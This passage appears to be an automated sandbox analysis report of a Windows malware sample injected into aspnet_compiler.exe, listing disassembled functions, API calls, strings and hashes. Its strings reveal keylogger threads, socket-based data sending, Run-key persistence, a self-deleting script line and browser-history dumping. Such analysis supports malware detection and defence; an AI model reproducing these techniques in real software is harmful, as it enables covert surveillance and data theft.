                                                                            • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                            • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                          • String ID:
                                                                          • API String ID: 4269425633-0
                                                                          • Opcode ID: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                          • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                          • Opcode Fuzzy Hash: 296a05bfb99c111a27fc262cb636efe6a000d6565ad7e80475f435e5bd850ba0
                                                                          • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free
                                                                          • String ID:
                                                                          • API String ID: 269201875-0
                                                                          • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                          • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                          • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                          • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                          APIs
                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53), ref: 0044FF20
                                                                          • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0042CE53,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?), ref: 0044FFA9
                                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0042CE53,0042CE53,?,00000002,?), ref: 0044FFBB
                                                                          • __freea.LIBCMT ref: 0044FFC4
                                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                          • String ID:
                                                                          • API String ID: 313313983-0
                                                                          • Opcode ID: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                          • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                          • Opcode Fuzzy Hash: e53b112c27c8f78300b60669bd3e779d88e901d1b4b0f4bdaec59810f61dd2f3
                                                                          • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                            • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                          • _free.LIBCMT ref: 0044E1A0
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                          • String ID:
                                                                          • API String ID: 336800556-0
                                                                          • Opcode ID: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                          • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                          • Opcode Fuzzy Hash: 1c337325f04e7d1350835243513ef37ea9cf72bd865eed212f137dea6565717b
                                                                          • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043A7C2,00000000,?,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08,?), ref: 00446F48
                                                                          • _free.LIBCMT ref: 00446F7D
                                                                          • _free.LIBCMT ref: 00446FA4
                                                                          • SetLastError.KERNEL32(00000000), ref: 00446FB1
                                                                          • SetLastError.KERNEL32(00000000), ref: 00446FBA
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorLast$_free
                                                                          • String ID:
                                                                          • API String ID: 3170660625-0
                                                                          • Opcode ID: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                          • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                          • Opcode Fuzzy Hash: f4408b0af08e6f25a576fef194bdae15b87294ed1dfbee705da3a0fd61bfb56a
                                                                          • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                          APIs
                                                                          • _free.LIBCMT ref: 0044F7B5
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • _free.LIBCMT ref: 0044F7C7
                                                                          • _free.LIBCMT ref: 0044F7D9
                                                                          • _free.LIBCMT ref: 0044F7EB
                                                                          • _free.LIBCMT ref: 0044F7FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                          • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                          • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                          • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                          APIs
                                                                          • _free.LIBCMT ref: 00443305
                                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                          • _free.LIBCMT ref: 00443317
                                                                          • _free.LIBCMT ref: 0044332A
                                                                          • _free.LIBCMT ref: 0044333B
                                                                          • _free.LIBCMT ref: 0044334C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 776569668-0
                                                                          • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                          • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                          • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                          • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                          APIs
                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                          • IsWindowVisible.USER32(?), ref: 004167A1
                                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                            • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                                          • String ID: (FG
                                                                          • API String ID: 3142014140-2273637114
                                                                          • Opcode ID: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                          • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                          • Opcode Fuzzy Hash: c7140c968b57e192add68dc6676992042de4a480ef872d90ee77a690e46fad53
                                                                          • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                          APIs
                                                                          • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                            • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                            • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                            • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                          • String ID: XCG$`AG$>G
                                                                          • API String ID: 2334542088-2372832151
                                                                          • Opcode ID: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                          • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                          • Opcode Fuzzy Hash: 57430c91427567827473bab5627dcff1f7b98a8ead265141081511e002c0e5a5
                                                                          • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe,00000104), ref: 00442714
                                                                          • _free.LIBCMT ref: 004427DF
                                                                          • _free.LIBCMT ref: 004427E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: _free$FileModuleName
                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                          • API String ID: 2506810119-572611079
                                                                          • Opcode ID: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                          • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                          • Opcode Fuzzy Hash: 037ffcd8ae4620a35ea0d85ea656a28a2901847f16e257e4da60b9a7372ecd68
                                                                          • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                            • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                            • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                            • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                                          • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                          • String ID: /sort "Visit Time" /stext "$8>G
                                                                          • API String ID: 368326130-2663660666
                                                                          • Opcode ID: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                          • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                          • Opcode Fuzzy Hash: 1a768b4e587f7e37ad4e89c2dbfac3ccd6e7f3946661fbe69184ab2adc4031be
                                                                          • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                          APIs
                                                                            • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                                          • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                          • ExitProcess.KERNEL32 ref: 0040C63E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateExecuteExitFileProcessShell
                                                                          • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                          • API String ID: 2309964880-3562070623
                                                                          • Opcode ID: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                          • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                          • Opcode Fuzzy Hash: 2f0c58e4ececc8c02d5b25f260c6243bbcd4e4e86e0679598fae02edbeb9a997
                                                                          • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                          APIs
                                                                          • CreateThread.KERNEL32(00000000,00000000,004099A9,004740F8,00000000,00000000), ref: 0040992A
                                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,004740F8,00000000,00000000), ref: 0040993A
                                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,004740F8,00000000,00000000), ref: 00409946
                                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                          • String ID: Offline Keylogger Started
                                                                          • API String ID: 465354869-4114347211
                                                                          • Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                          • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                          • Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
                                                                          • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                          APIs
                                                                            • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                            • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                          • CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
                                                                          • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
                                                                          • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                          • String ID: Online Keylogger Started
                                                                          • API String ID: 112202259-1258561607
                                                                          • Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                          • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                          • Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
                                                                          • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                          • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                          • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                                          • String ID: `@
                                                                          • API String ID: 2583163307-951712118
                                                                          • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                          • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                          • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                          • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                          APIs
                                                                          • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                          • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                          Strings
                                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Create$EventLocalThreadTime
                                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                                          • API String ID: 2532271599-1507639952
                                                                          • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                          • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                          • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                          • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                          • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                          • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                          • String ID: Connection Timeout
                                                                          • API String ID: 2055531096-499159329
                                                                          • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                          • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                          • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                          • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                          APIs
                                                                          • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                          • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004742E0,74DF37E0,?), ref: 004127AD
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004742E0,74DF37E0,?,?,?,?,?,0040BE18,?,00000000), ref: 004127B8
                                                                          Strings
                                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCreateValue
                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                          • API String ID: 1818849710-1051519024
                                                                          • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                          • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                          • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                          • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                          APIs
                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                            • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                          • String ID: bad locale name
                                                                          • API String ID: 3628047217-1405518554
                                                                          • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                          • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                          • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                          • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                          APIs
                                                                          • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                          • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000), ref: 00412709
                                                                          • RegCloseKey.ADVAPI32(004655B0,?,?,0041BC46,WallpaperStyle,004655B0,00000001,00473EE8,00000000,?,004079DD,00000001), ref: 00412714
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCreateValue
                                                                          • String ID: Control Panel\Desktop
                                                                          • API String ID: 1818849710-27424756
                                                                          • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                          • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                          • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                          • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                          APIs
                                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                          • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
